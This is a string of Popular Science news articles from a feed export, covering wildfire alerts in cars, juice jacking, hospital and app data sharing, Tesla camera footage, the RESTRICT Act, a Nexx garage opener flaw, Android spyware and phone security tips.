One major area of interest for Speicher is working with navigation services like Google Maps and Waze. Both navigation systems currently offer basic alerts, which indicate areas where there are hazards like fires or flooding, but Speicher says he is eager to explore partnerships with these providers that might allow for more specific navigation offerings in the future. That could include not only showing where a hazard is, but offering directions to avoid it or leave it. Speicher says they are also looking into providing alerts once someone has left the fire zone, as well as figuring out how these console alerts could be translated into other languages. 

Making up the messaging

From Sutton’s perspective as a risk communications researcher, the biggest question with this new model is what the actual messaging looks and sounds like. In her experience, this is a critical area that has traditionally been overlooked in the past when it came to developing emergency alerts. For example, she says early wireless emergency alerts were actually found to fail to motivate people to take protective action—she and other researchers found people were actually more likely to seek out additional information instead. IPAWS has since tweaked its allotted amount of characters and better targeted its messaging to make warnings clearer for recipients. 

With this new WUI Integration Model, Sutton believes the delivery and design of the alert is particularly important given the fact that recipients will be driving. That means the message needs to be easily and accurately digested.

“They also have to solve the potential problems that could arise with people being notified about a significant event, which is very disruptive,” Sutton added, as the typical alert sounds or display used on cell phones might be too jarring for a driver. 

In a press release from S&T about the program, Speicher said such behavioral science is being factored into the design of the model, with the goal of creating a “standardized messaging format” that can be easily recognized by drivers. 

What’s next, and what you can do now 

Speicher says the next WUI Integration Model test is currently slated for July, and he teased a number of other emergency messaging developments that are also in the works, including a way to distribute alerts through streaming providers like Netflix or Hulu. But for now, there are a few ways to increase your likelihood of receiving relevant emergency alerts. 

Experts strongly recommend keeping on those wireless emergency alerts, which tend to be the best way to stay in the loop. If you have opted out in the past and are interested in turning them back on, check your phone settings for both emergency and public safety alerts. You can also look up your state or local office of emergency management to better understand your area’s risks and any opportunities to stay more informed. In some cases, there might be additional apps you can download for more specialized alerts, such as ShakeAlert, an earthquake alert system for Western states. 

The post In the future, your car could warn you about nearby wildfires appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
Why you shouldn’t charge your phone at a public USB port https://www.popsci.com/technology/fbi-warns-public-usb-charging/ Tue, 11 Apr 2023 19:00:00 +0000 https://www.popsci.com/?p=533316
person charging phone at airport charging station.
Beware of public USB charging stations. DEPOSIT PHOTOS

Here's what the FBI is sharing about a hacking technique called "juice jacking."

The post Why you shouldn’t charge your phone at a public USB port appeared first on Popular Science.

]]>
person charging phone at airport charging station.
Beware of public USB charging stations. DEPOSIT PHOTOS

Public USB ports seem like a convenient way to charge your phone. But, as the FBI’s Denver field office recently tweeted, they may not be safe. With a technique called “juice jacking,” hackers can use public USB ports to install malware and monitoring software on your devices. Theoretically, the kind of tools that can be installed this way can allow hackers to access the contents of your smartphone and steal your passwords, so they can do things like commit identity theft, transfer money from your bank account, or simply sell your information on the dark web. 

While “juice jacking” is just one of the ways that USB devices can spread malware, it’s a particularly insidious technique as you don’t need to be targeted directly. Just plugging your smartphone into a USB port in an airport, hotel, shopping center, or any other public location could be enough for your data to get stolen. According to the FCC, criminals can load malware directly onto public USB charging stations, which means that literally any USB port could be compromised. While any given bad actor’s ability to do this likely depends on the particular kind of charging port and what software it runs, it’s also possible that criminals could install an already-hacked charging station—particularly if they have the assistance of someone who works there. 

In other words, there is no way guarantee that a public USB port hasn’t been hacked, so the safest option is to assume that they all come with potential dangers. And it’s not just ports—free or unattended USB cables could also be used to install malware.

The issue lies with the USB standard itself. As The Washington Post explains, USB-A cables (the standard one) have four pins—two for power transfer and two for data transfer. Plugging your smartphone into a USB port using a regular USB potentially means connecting it directly to a device that can transfer data to or from it. And although the Post cites an expert saying that he recommends using newer devices that charge over USB-C, even they are not immune to juice jacking attacks. (Nor for that matter are iPhones that charge over a lightning cable.)

Software engineers for both Android and iOS devices have taken some steps to mitigate the risk of having user data stolen or malware installed over public USB ports. However, our coverage of all the various “zero day” attacks (or previously undiscovered vulnerabilities) should be enough to convince you that even keeping your smartphone up to date with all the latest security patches may not be sufficient to protect you against every new and emerging threat. 

So what can you do? Well, the simplest option is to just bring your own charging cable and wall plug. Unless you are the target of an Ocean’s 11-worth heist, it is highly unlikely that your personal charging cable or plug is compromised. Just make sure to plug directly into an AC power outlet, and not a USB outlet.

If you’re traveling internationally and aren’t sure about what sort of plugs you will have access to, a USB battery pack and your own charging cable would be good to have handy. You can also charge directly from other personal devices like a laptop.

There are power-only USB cables and devices called “USB condoms” that block all USB data transfer, but they’re likely a less ideal options, purely because you need to remember to bring a special cable rather than your standard USB cable. 

And if you do absolutely have to connect to a public USB port, keep a close eye on your smartphone. If you get a popup asking if you trust the device, saying you have connected to a hard drive, or notice any kind of strange behavior, disconnect it immediately. Though seriously—your best bet is to just bring your own charger.

The post Why you shouldn’t charge your phone at a public USB port appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
Almost 99 percent of hospital websites give patient data to advertisers https://www.popsci.com/technology/hospitals-data-privacy/ Mon, 10 Apr 2023 18:00:00 +0000 https://www.popsci.com/?p=533052
Empty Bed Gurney in Hospital Corridor
Of over 3,700 hospitals surveyed, almost 99 percent used third-party tracking codes on their websites. Deposit Photos

Outside companies have a troubling amount of access to users' medical information, according to new research.

The post Almost 99 percent of hospital websites give patient data to advertisers appeared first on Popular Science.

]]>
Empty Bed Gurney in Hospital Corridor
Of over 3,700 hospitals surveyed, almost 99 percent used third-party tracking codes on their websites. Deposit Photos

Last summer, The Markup published a study revealing that roughly one-third of the websites of Newsweek’s top 100 hospitals in America utilized the Meta Pixel. In doing so, a small bit of coding provided the namesake social media giant with patients’ “medical conditions, prescriptions, and doctor’s appointments” for advertising purposes. 

The most recent deep dive into third-party data tracking on medical websites, however, is even more widespread. According to researchers at the University of Pennsylvania, you could be hard-pressed to find a hospital website that doesn’t include some form of data tracking for its visitors.

As detailed in a new study published in Health Affairs, a survey of 3,747 non-federal, acute care hospitals with emergency departments taken from a 2019 American Hospital Association survey showed that nearly 99 percent used at least one type of website tracking code that offered data to third-parties. Around 94 percent of those same facilities included at least one third-party cookie. Outside companies receiving the most data included Google-owners at Alphabet (98.5 percent), Meta (55.6 percent), and Adobe Systems (31.4 percent). Other third-parties regularly included AT&T, Verizon, Amazon, Microsoft, and Oracle.

[Related: Two alcohol recovery apps shared user data without their consent.]

The Health Insurance Portability and Accountability Act (HIPAA) prohibits data tracking “unless certain conditions are met,” according to The HIPAA Journal. That said, the Journal explains most third-parties receiving the data aren’t HIPAA-regulated, and thereby the transferred data’s uses and disclosures are “largely unregulated.”

“The transferred information could be used for a variety of purposes, such as serving targeted advertisements related to medical conditions, health insurance, or medications,” explains The HIPAA Journal before cautioning, “What actually happens to the transferred data is unclear.”

In an emailed statement provided to PopSci, Marcus Schabacker, President and CEO of the independent healthcare monitoring nonprofit ECRI says they are “deeply disturbed” by the study’s results. “Besides the severe violation of privacy, ECRI is concerned this data will allow nefarious, bad actors to target vulnerable people living with severe health conditions with advertisements for non-evidence-based snake oil ‘treatments’ that cost money and do nothing—or worse, cause injury or death,” Schabacker adds.

[Related: How data brokers threaten your privacy.]

The ECRI urged hospitals to “immediately” stop data tracking by removing third party coding and “along with advertisers, take responsibility or be held liable for any harm that can be traced back to a data sharing arrangement.” Additionally, Schabacker argued that the revelations once again underscored the need to update health tech and information regulations, including HIPAA, which they allege does not address many “questionable practices” that have arisen since near ubiquitous pixel-tracking strategies.

As The HIPAA Journal also notes, litigation is all-but-assured. In 2021, three Boston-area hospitals agreed to pay over $18 million in settlement against allegations they shared users’ data to third parties without patients’ consent, and that “many more lawsuits against healthcare providers are pending.”

The post Almost 99 percent of hospital websites give patient data to advertisers appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
Tesla employees allegedly viewed and joked about drivers’ car camera footage https://www.popsci.com/technology/tesla-camera-abuse/ Fri, 07 Apr 2023 13:30:00 +0000 https://www.popsci.com/?p=532506
Tesla vehicle owners' 'private scenes of life' were seen by employees via the drivers' car cameras, report says.
Tesla vehicle owners' 'private scenes of life' were seen by employees via the drivers' car cameras, report says. Deposit Photos

A Reuters report claims employees also shared and Photoshopped the sensitive images into memes.

The post Tesla employees allegedly viewed and joked about drivers’ car camera footage appeared first on Popular Science.

]]>
Tesla vehicle owners' 'private scenes of life' were seen by employees via the drivers' car cameras, report says.
Tesla vehicle owners' 'private scenes of life' were seen by employees via the drivers' car cameras, report says. Deposit Photos

A new investigation from Reuters alleges Tesla employees routinely viewed and shared “highly invasive” video and images taken from the onboard cameras of owners’ vehicles—even from a Tesla owned by CEO Elon Musk.

While Tesla claims consumers’ data remains anonymous, former company workers speaking to Reuters described a far different approach to drivers’ privacy—one filled with rampant policy violations, customer ridicule, and memes, they claim.

Tesla’s cars feature a number of external cameras that inform vehicles’ “Full Self-Driving” Autopilot system—a program that has received its own fair share of regulatory scrutiny regarding safety issues. The AI underlying this technology, however, requires copious amounts of visual training, often through the direction of human reviewers such as Tesla’s employees, according to the new report. Workers collaborate with company engineers to often manually identify and label objects such as pedestrians, emergency vehicles, and roads’ lane lines, alongside a host of other subjects encountered in everyday driving scenarios, as detailed in the Reuters findings. This, however, requires access to vehicle cameras.

[Related: Tesla is under federal investigation over autopilot claims.]

Tesla owners are led to believe camera feeds were handled by employees sensitively: The company’s Customer Privacy Notice states owners’ “recordings remain anonymous and are not linked to you or your vehicle,” while Tesla’s website states in no uncertain terms, “Your Data Belongs to You.”

While multiple former employees confirmed to Reuters the files were by-and-large used for AI training, that allegedly didn’t stop frequent internal sharing of images and video on the company’s internal messaging system, Mattermost. According to the report, staffers regularly exchanged images they encountered while labeling footage, often Photoshopping them for jokes and turning them into self-referential emojis and memes.

While one former worker claimed they never came across particularly salacious footage, such as nudity, they still saw “some scandalous stuff sometimes… just definitely a lot of stuff that, like, I wouldn’t want anybody to see about my life.” The same former employee went on to describe encountering “just private scenes of life,” including intimate moments, laundry contents, and even car owners’ children. Sometimes this also included “disturbing content,” the employee continued, such as someone allegedly being dragged to a car against their will.

Although two ex-employees said they weren’t troubled by the image sharing, others were so perturbed that they were wary of driving Tesla’s own company cars, knowing how much data could be collected within them, regardless of who owned the vehicles. According to Reuters, around 2020, multiple employees came across and subsequently shared a video depicting a submersible vehicle featured in the 1977 James Bond movie, The Spy Who Loved Me. Its owner? Tesla CEO Elon Musk.

The post Tesla employees allegedly viewed and joked about drivers’ car camera footage appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
The ‘TikTok ban’ is a legal nightmare beyond TikTok https://www.popsci.com/technology/tiktik-ban-problems/ Thu, 06 Apr 2023 18:00:00 +0000 https://www.popsci.com/?p=532328
TikTok app homescreen on smartphone close-up
You don't need to use TikTok for its potential ban to affect you. Deposit Photos

Critics say that if it becomes law, the RESTRICT Act bill could authorize broadly defined crackdowns on free speech and internet access.

The post The ‘TikTok ban’ is a legal nightmare beyond TikTok appeared first on Popular Science.

]]>
TikTok app homescreen on smartphone close-up
You don't need to use TikTok for its potential ban to affect you. Deposit Photos

The fate of the RESTRICT Act remains unclear. Also known as the “TikTok ban,” the bill has sizable bipartisan political—and even public—support, but critics say the bill in its current form focuses on the wrong issues. If it becomes law, it could change the way the government polices your internet activity, whether or not you use the popular video sharing app. 

Proponents of the RESTRICT Act, which stands for “Restricting the Emergence of Security Threats that Risk Information and Communications Technology,” have called China’s social media app dangerous and invasive. But Salon, among others, has noted that “TikTok” does not appear once throughout the RESTRICT Act’s 55-page proposal. Salon even refers to it as “Patriot Act 2.0” in regards to its minefield of privacy violations.

[Related: Why some US lawmakers want to ban TikTok.]

Critics continue to note that the passage of the bill into law could grant an expansive, ill-defined set of new powers to unelected committee officials. Regardless of what happens with TikTok itself, the new oversight ensures any number of other apps and internet sites could be subjected to blacklisting and censorship at the government’s discretion. What’s more, everyday citizens may face legal prosecution for attempting to circumvent these digital blockades—such as downloading banned apps via VPN or while in another country—including 25 years of prison time.

In its latest detailed rundown published on Tuesday, the digital privacy advocacy group Electronic Frontier Foundation called the potential law a “dangerous substitute” for comprehensive data privacy legislation that could actually benefit internet users, such as bills passed for states like California, Colorado, Iowa, Connecticut, Virginia, and Utah. Meanwhile, the digital rights nonprofit Fight for the Future’s ongoing #DontBanTikTok campaign describes the RESTRICT Act as “oppressive” while still failing to address “valid privacy and security concerns.” The ACLU also maintains the ban “would violate [Americans’] constitutional right to free speech.”

As EFF noted earlier this week, the current proposed legislation would authorize the executive branch to block “transactions [and] holdings” of “foreign adversaries” involving information and communication technology if deemed “undue or unacceptable risk[s]” to national security. These decisions would often be at the sole discretion of unelected government officials, and because of the legislation’s broad phrasing, they could make it difficult for the public to learn exactly why a company or app is facing restrictions.

In its lengthy, scathing rebuke, Salon offered the following bill section for consideration:

“If a civil action challenging an action or finding under this Act is brought, and the court determines that protected information in the administrative record, including classified or other information subject to privilege or protections under any provision of law, is necessary to resolve the action, that information shall be submitted ex parte and in camera to the court and the court shall maintain that information under seal.”

[RELATED: Twitter’s ‘Blue Check’ drama is a verified mess.]

Distilled down, this section could imply that the evidence about an accused violator—say, an average US citizen who unwittingly accessed a banned platform—could be used against them without their knowledge.

If RESTRICT Act were to be passed as law, the “ban” could force changes in how the internet fundamentally works within the US, “including potential requirements on service platforms to police and censor the traffic of users, or even a national firewall to prevent users from downloading TikTok from sources across our borders,” argues the Center for Democracy and Technology.

Because of the bill’s language, future bans could go into effect for any number of other, foreign-based apps and websites. As Salon also argues, the bill allows for a distressing lack of accountability and transparency regarding the committee responsible for deciding which apps to ban, adding that “the lack of judicial review and reliance on Patriot Act-like surveillance powers could open the door to unjustified targeting of individuals or groups.”

Instead of the RESTRICT Act, privacy advocates urge politicians to pass comprehensive data privacy reforms that pertain to all companies, both domestic and foreign. The EFF argues, “Congress… should focus on comprehensive consumer data privacy legislation that will have a real impact, and protect our data no matter what platform it’s on—TikTok, Facebook, Twitter, or anywhere else that profits from our private information.”

The post The ‘TikTok ban’ is a legal nightmare beyond TikTok appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
These WiFi garage doors have a major cyber vulnerability https://www.popsci.com/technology/nexx-garage-door-cyber-vulnerability/ Wed, 05 Apr 2023 19:00:00 +0000 https://www.popsci.com/?p=531964
Car parked outside garage attached to a home
Nexx garage doors have a huge security flaw. dcbel / Unsplash

Despite being alerted to these issues, the company has made no attempt to fix things.

The post These WiFi garage doors have a major cyber vulnerability appeared first on Popular Science.

]]>
Car parked outside garage attached to a home
Nexx garage doors have a huge security flaw. dcbel / Unsplash

If you have a Nexx brand WiFi garage door opener, now would be a good time to uninstall it. A security researcher has discovered a number of vulnerabilities that allow hackers anywhere in the world to remotely open any Nexx-equipped garage door, and detailed it in a blog post on Medium. Worst of all, the company has made no attempt to fix things.

First reported by Motherboard, security researcher Sam Sabetan discovered the critical vulnerabilities in Nexx’s smart device product line while conducting independent security research. Although he also found vulnerabilities in Nexx’s smart alarms and plugs, it’s the WiFi connected Smart Garage Door Opener that presents the biggest issue. 

As Sabetan explains it, when a user sets up a new Nexx device using the Nexx Home mobile app, it receives a password from the Nexx cloud service—supposedly to allow for secure communication between the device and Nexx’s online services using a lightweight messaging protocol called MQTT (Message Queuing Telemetry Transport). MQTT uses a communications framework called the publish-subscribe model, which allows it to work over unstable networks and on resource-constrained devices, but comes with additional security concerns. 

When someone uses the Nexx app to open their garage door, the app doesn’t directly communicate with the door opener. Instead, it posts a message to Nexx’s MQTT server. The garage door opener is subscribed to the server and when it sees the relevant message, it opens the door. This enables reliable performance and means your smartphone doesn’t have to be on the same network as your garage door opener, but it’s crucial that every device using the service has a secure, unique password. 

That’s not the case, though. Sabetan discovered that all of the Nexx Garage Door Controllers and Smart Plugs have the exact same password

In a video demonstrating the hack, Sabetan shows how he was able to get the universal password by intercepting his Nexx Smart Garage Door Opener’s communications with the MQTT server. Sabetan was then able to log into the server with the intercepted credentials and see the messages posted by devices from hundreds of Nexx customers. These messages also revealed the email addresses, device IDs, and the name of the account holder. 

Worse, Sabetan was able to replay the message posted to the server by his device to open his garage door. Although he didn’t, he could have used the same technique to open the garage door of any Nexx user in the world. (He could also have turned on or off their smart plugs which would have been very annoying, but not as likely to be dangerous.)

Since Nexx IDs are tied to email addresses, this vulnerability potentially allows hackers to target specific Nexx users, or just randomly open garage doors because they can. And because the universal password is embedded directly in the devices, there is no way for users to change it or otherwise secure themselves. 

Sabetan estimates that there are over 40,000 affected Nexx devices, and he determined that more than 20,000 people have active Nexx accounts. If you’re one of them, the only thing you can do is unplug your Nexx devices and open a support ticket with the company. 

And as damning as all this is, Nexx’s lack of response makes things even worse. Sabetan first contacted Nexx support about the vulnerability in early January. The company ignored his report despite multiple follow-ups, but responded to an unrelated support question. In February, Sabetan contacted the US Cybersecurity and Infrastructure Security Agency (CISA) to report the vulnerabilities, and even CISA wasn’t able to get a reply from Nexx. Finally, Motherboard attempted to contact Nexx before running the story revealing the vulnerability publicly—of course, it heard nothing back. 

Now, CISA has issued a public advisory notice about the vulnerabilities, and Sabetan and Motherboard have described them in detail. This means everything a hacker needs to know to exploit a Nexx Garage Door Opener, Smart Plug, or Smart Alarm is out in the wild. So if you have one of these devices, go and unplug it right now. 

The post These WiFi garage doors have a major cyber vulnerability appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
Two alcohol recovery apps shared user data without their consent https://www.popsci.com/technology/tempest-momentum-data-privacy/ Wed, 05 Apr 2023 18:00:00 +0000 https://www.popsci.com/?p=531950
Woman's hands typing on laptop keyboard
One of the companies passed along sensitive user data as far back as 2017. Deposit Photos

Tempest and Momentum provide tools for users seeking alcohol addiction treatment—while sending private medical data to third-party advertisers.

The post Two alcohol recovery apps shared user data without their consent appeared first on Popular Science.

]]>
Woman's hands typing on laptop keyboard
One of the companies passed along sensitive user data as far back as 2017. Deposit Photos

Update 04/06/2023: Comments from Monument’s CEO have been added to this article.

According to recent reports, two online alcohol recovery startups shared users’ detailed private health information and personal data to third-party advertisers without their consent. They were able to do so via popular tracking systems such as the Meta Pixel. Both Tempest and its parent company, Monument, confirmed the extensive privacy violations to TechCrunch on Tuesday. They now claim to no longer employ the frequently criticized consumer profiling products developed by companies such as Microsoft, Google, and Facebook.

In a disclosure letter mailed to its consumers last week, Monument states “we value and respect the privacy of our members’ information,” but admitted “some information” may have been shared to third parties without the “appropriate authorization, consent, or agreements required by law.” The potentially illegal violations stem as far back as 2020 for Monument members, and 2017 for those using Tempest.

Within those leaks, as many as 100,000 accounts’ names, birthdates, email addresses, telephone numbers, home addresses, membership IDs, insurance IDs, and IP addresses. Additionally, users’ photographs, service plans, survey responses, appointment-related info, and “associated health information” may also have been shared to third-parties. Monument and Tempest assured customers, however, that their Social Security numbers and banking information had not been improperly handled.

[Related: How data brokers threaten your privacy.]

Major data companies’ largely free “pixel” tools generally work by embedding a small bit of code into websites. The program then subsequently supplies immensely personal and detailed information to both third-party businesses, as well as the tracking tech’s makers to help compile extensive consumer profiles for advertising purposes. One study estimates that approximately one-third of the 80,000 most popular websites online utilize Meta Pixel (disclosure: PopSci included), for example. While both Tempest and Monument pledge to have removed tracking code from their sites, TechCrunch also notes the codes’ makers are not legally required to delete previously collected data.

“Monument and Tempest should be ashamed of sharing this extremely personal information of people, especially considering the nature and vulnerability of their clients,” Caitlin Seeley George, campaigns managing director of the digital privacy advocacy group, Fight for the Future, wrote PopSci via email. For George, the revelations are simply the latest examples of companies disregarding privacy for profit, but argues lawmakers “should similarly feel ashamed” that the public lacks legal defense or protection from these abuses. “It seems like every week we hear another case of companies sharing our data and prioritizing profits over privacy. This won’t end until lawmakers pass privacy laws,” she said.

“Protecting our patients’ privacy is a top priority,” Monument CEO Mike Russell told PopSci over email. “We have put robust safeguards in place and will continue to adopt appropriate measures to keep data safe. In addition, we have ended our relationship with third-party advertisers that will not agree to comply with our contractual requirements and applicable law.”

Tracking tools are increasingly the subject of scrutiny and criticism as more and more reports detail privacy concerns—last year, an investigation from The Markup and The Verge revealed that some of the country’s most popular tax prep software providers utilize Meta Pixel. The same tracking code is also at the center of a lawsuit in California concerning potential HIPAA violations stemming from hospitals sharing patients’ medical data.

Correction 04/06/2023: A previous version of this article’s headline stated Tempest and Monument “sold” user data. A spokesperson for the companies stated they “shared” data with third-party companies.

The post Two alcohol recovery apps shared user data without their consent appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
Colombia is deploying a new solar-powered electric boat https://www.popsci.com/technology/colombia-electric-patrol-boat-drone/ Fri, 31 Mar 2023 14:13:04 +0000 https://www.popsci.com/?p=524519
Colombia is not the only country experimenting with electric uncrewed boats. Above, an Ocean Aero Triton drone (left) and a Saildrone Explorer USV. These two vessels were taking part in an exercise involving the United Arab Emirates Navy and the US Navy in February, 2023.
Colombia is not the only country experimenting with electric uncrewed boats. Above, an Ocean Aero Triton drone (left) and a Saildrone Explorer USV. These two vessels were taking part in an exercise involving the United Arab Emirates Navy and the US Navy in February, 2023. Jay Faylo / US Navy

The 29-foot-long vessel is uncrewed, and could carry out intelligence, surveillance, and reconnaissance missions for the Colombian Navy.

The post Colombia is deploying a new solar-powered electric boat appeared first on Popular Science.

]]>
Colombia is not the only country experimenting with electric uncrewed boats. Above, an Ocean Aero Triton drone (left) and a Saildrone Explorer USV. These two vessels were taking part in an exercise involving the United Arab Emirates Navy and the US Navy in February, 2023.
Colombia is not the only country experimenting with electric uncrewed boats. Above, an Ocean Aero Triton drone (left) and a Saildrone Explorer USV. These two vessels were taking part in an exercise involving the United Arab Emirates Navy and the US Navy in February, 2023. Jay Faylo / US Navy

Earlier this month, a new kind of electric boat was demonstrated in Colombia. The uncrewed COTEnergy Boat debuted at the Colombiamar 2023 business and industrial exhibition, held from March 8 to 10 in Cartagena. It is likely a useful tool for navies, and was on display as a potential product for other nations to adopt. 

While much of the attention in uncrewed sea vehicles has understandably focused on the ocean-ranging craft built for massive nations like the United States and China, the introduction of small drone ships for regional powers and routine patrol work shows just far this technology has come, and how widespread it is likely to be in the future.

“The Colombian Navy (ARC) intends to deploy the new electric unmanned surface vehicle (USV) CotEnergy Boat in April,” Janes reports, citing Admiral Francisco Cubides. 

The boat is made from aluminum and has a compact, light body. (See it on Instagram here.) Just 28.5 feet long and under 8 feet wide, the boat is powered by a 50 hp electric motor; its power is sustained in part by solar panels mounted on the top of the deck. Those solar panels can provide up to 1.1 kilowatts at peak power, which is enough to sustain its autonomous operation for just shy of an hour.

The vessel was made by Atomo Tech and Colombia’s state-owned naval enterprise company, COTECMAR. The company says the boat’s lightweight form allows it to take on different payloads, making it suitable for “intelligence and reconnaissance missions, port surveillance and control missions, support in communications link missions, among others.”

Putting sensors on small, autonomous and electric vessels is a recurring theme in navies that employ drone boats. Even a part of the ocean that seems small, like a harbor, represents a big job to watch. By putting sensors and communications links onto an uncrewed vessel, a navy can effectively extend the range of what can be seen by human operators. 

In January, the US Navy used Saildrones for this kind of work in the Persian Gulf. Equipped with cameras and processing power, the Saildrones identified and tracked ships in an exercise as they spotted them, making that information available to human operators on crewed vessels and ultimately useful to naval commanders. 

Another reason to turn to uncrewed vessels for this work is that they are easier to run on fully  electric power, as opposed to a diesel or gasoline. COTECMAR’s video description notes that the COTEEnergy Boat is being “incorporated into the offer of sustainable technological solutions that we are designing for the energy transition.” Making patrol craft solar powered and electric starts the vessels sustainable.

While developed as a military tool, the COTENERGY boat can also have a role in scientific and research expeditions. It could serve as a communications link between other ships, or between ships and other uncrewed vessels, ensuring reliable operation and data collection. Putting in sensors designed to look under the water’s surface could aid with oceanic mapping and observation. As a platform for sensors, the COTEnergy Boat is limited by what its adaptable frame can carry and power, although its load capacity is 880 pounds.

Not much more is known about the COTEnergy Boat at this point. But what is compelling about the vessel is how it fits into similar plans of other navies. Fielding small useful autonomous scouts or patrol craft, if successful, could become a routine part of naval and coastal operations.

With these new kinds of boat come new challenges. Because uncrewed ships lack humans, it can make them easier targets for other navies or possibly maritime criminal groups, like pirates. The same kind of Saildrones used by the US Navy to scout the Persian Gulf have also been detained, if briefly, by the Iranian Navy. With such detentions comes the risk that data on the ship is compromised, and data collection tools figured out, making it easier for hostile forces to fool or evade the sensors in the future.

Still, the benefits of having a flexible, solar-powered robot ship outweigh such risks. Inspection of ports is routine until it isn’t, and with a robotic vessel there to scout first, humans can wait to act until they are needed, safely removed from their remote robotic companions.

Watch a little video of the COTEnergy Boat below:

The post Colombia is deploying a new solar-powered electric boat appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
What to know about a ‘sophisticated hacking campaign’ against Android phones https://www.popsci.com/technology/android-phones-hacking-amnesty-international-security-lab/ Thu, 30 Mar 2023 18:30:00 +0000 https://www.popsci.com/?p=524254
Security photo

The vulnerabilities were recently announced by Amnesty International’s Security Lab.

The post What to know about a ‘sophisticated hacking campaign’ against Android phones appeared first on Popular Science.

]]>
Security photo

Amnesty International revealed this week that its Security Lab has uncovered a “sophisticated hacking campaign by a mercenary spyware company.” They say it has been running “since at least 2020” and takes aim at Android smartphones with a number of “zero-day” security vulnerabilities. (A “zero day” vulnerability is an exploit that is previously undiscovered and unmitigated.) 

Amnesty International disclosed the details of the campaign to Google’s Threat Analysis Group, so it—as well as other affected companies, including Samsung—have since been able to release the necessary security patches for their devices. 

Amnesty International’s Security Lab is responsible for monitoring and investigating companies and governments that employ cyber-surveillance technologies to threaten human rights defenders, journalists, and civil society. It was instrumental in uncovering the extent to which NSO Group’s Pegasus Spyware was used by governments around the world

While the Security Lab continues to investigate this latest spyware campaign, Amnesty International is not revealing the company it has implicated (though Google suggests it’s Variston, a group it discovered in 2022). Either way, Amnesty International claims that the attack has “all the hallmarks of an advanced spyware campaign developed by a commercial cyber-surveillance company and sold to governments hackers to carry out targeted spyware attacks.”

As part of the spyware campaign, Google’s Threat Analysis Group discovered that Samsung users in the United Arab Emirates were being targeted with one-time links sent over SMS. If they opened the link in the default Samsung Internet Browser, a “fully featured Android spyware suite” that was capable of decrypting and capturing data from various chat services and browser applications would get installed on their phone. 

The exploit relied on a chain of multiple zero-day and discovered but unpatched vulnerabilities, which reflects badly on Samsung. A fix was released for one of the unpatched vulnerabilities in January 2022 and for the other in August 2022. Google contends that if Samsung had released the security updates, “the attackers would have needed additional vulnerabilities to bypass the mitigations.” (Samsung released the fixes in December 2022.)

With that said, one of the zero-day vulnerabilities would also allow hackers to attack Linux desktop and embedded systems, and Amnesty International suggests that other mobile and desktop devices have been targeted as part of the spyware campaign, which has been ongoing since at least 2020. The human rights group also notes that the spyware was delivered from “an extensive network of more than 1000 malicious domains, including domains spoofing media websites in multiple countries,” which lends credence to its claims that a commercial spyware group is behind it.

Although it is not yet clear who the targets of this attack were, according to Amnesty International, “human rights defenders in the UAE have long been victimized by spyware tools from cyber-surveillance companies.” For example, Ahmed Mansoor was targeted by spyware from the NSO Group and jailed as a result of his human rights work

As well as the UAE, Amnesty International’s Security Lab found evidence of the spyware campaign in Indonesia, Belarus, and Italy, though it concludes that “these countries likely represent only a small subset of the overall attack campaign based on the extensive nature of the wider attack infrastructure.”

“Unscrupulous spyware companies pose a real danger to the privacy and security of everyone. We urge people to ensure they have the latest security updates on their devices,” says Donncha Ó Cearbhaill, head of Security Lab, in the statement on Amnesty International’s website. “While it is vital such vulnerabilities are fixed, this is merely a sticking plaster to a global spyware crisis. We urgently need a global moratorium on the sale, transfer, and use of spyware until robust human rights regulatory safeguards are in place, otherwise sophisticated cyber-attacks will continue to be used as a tool of repression against activists and journalists.”

At least in the United States, the government seems to agree. President Biden signed an executive order on March 27 blocking federal agencies from using spyware “that poses significant counterintelligence or security risks to the United States Government or significant risks of improper use by a foreign government or foreign person.”

The post What to know about a ‘sophisticated hacking campaign’ against Android phones appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
Your checklist for maximum smartphone security https://www.popsci.com/story/diy/phone-security-protect-accounts/ Thu, 21 Jan 2021 13:00:00 +0000 https://stg.popsci.com/uncategorized/phone-security-protect-accounts/
It's easy to take back control of your data with this smartphone security checklist.
Use this security checklist to make sure you're the only person accessing the data on your phone. Priscilla Du Preez/Unsplash

If you think someone might've been snooping on your phone, this is how to take back your privacy.

The post Your checklist for maximum smartphone security appeared first on Popular Science.

]]>
It's easy to take back control of your data with this smartphone security checklist.
Use this security checklist to make sure you're the only person accessing the data on your phone. Priscilla Du Preez/Unsplash

We may earn revenue from the products available on this page and participate in affiliate programs. Learn more ›

Everyone wants the data on their phone to stay private, and Android and iOS come with a variety of security features that will prevent other people from sneaking a peek.

If you suspect someone is snooping on you, there are some simple steps you can follow to secure your information, as well as a few warning signs to look out for to make sure it doesn’t happen in the future.

How to keep your lock screen secure

Whether you use a PIN code or a biometric feature (like your face or fingerprint) your phone’s lock screen is the first barrier against unauthorized access.

You can customize lock screen security on Android by going to Settings, Security & privacy, Device lock, and then Screen lock. Meanwhile, from the Settings app on iOS, choose either Touch ID & Passcode or Face ID & Password depending on which biometric security method is built into your iPhone.

[Related: 7 secure messaging apps you should be using]

You should also make sure the screen on your device locks as soon as possible after you’ve stopped using it—otherwise, someone could surreptitiously swipe it while you’re not looking before the locking mechanism kicks in. On Android, open Settings, then go to Display and Screen timeout to set how quickly the screen should turn off—your options go from 15 seconds to 30 minutes. Over in iOS settings, pick Display & Brightness, then Auto-Lock. The shorter the time period you set here, the more secure your data is.

If you need to lend your phone to someone, but still worry about their unfettered access to your handset, know that you can lock people inside one particular app or prevent them from installing anything while you’re not looking. We’ve gone deeper into these features and other similar security options, for both Android and iOS.

How to avoid spyware on your phone

Thanks to the security protocols in place on Android and iOS, it’s actually quite difficult for spying software to get on your phone without your knowledge. To succeed, someone would need to physically access your phone and install a monitoring app, or trick you into clicking on a link, opening a dodgy email attachment, or downloading something from outside your operating system’s official app store. You should see a warning if you do any of these things by mistake, but because it’s easy to disregard those notifications, you should always be careful what you click on.

